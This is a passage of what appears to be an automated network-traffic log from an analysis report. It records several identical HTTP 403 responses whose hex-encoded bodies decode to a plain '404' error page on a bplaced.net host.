6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:03 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=120X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:04 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=110X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:05 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=106X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:06 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=101X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:07 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=109X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:08 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=79X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
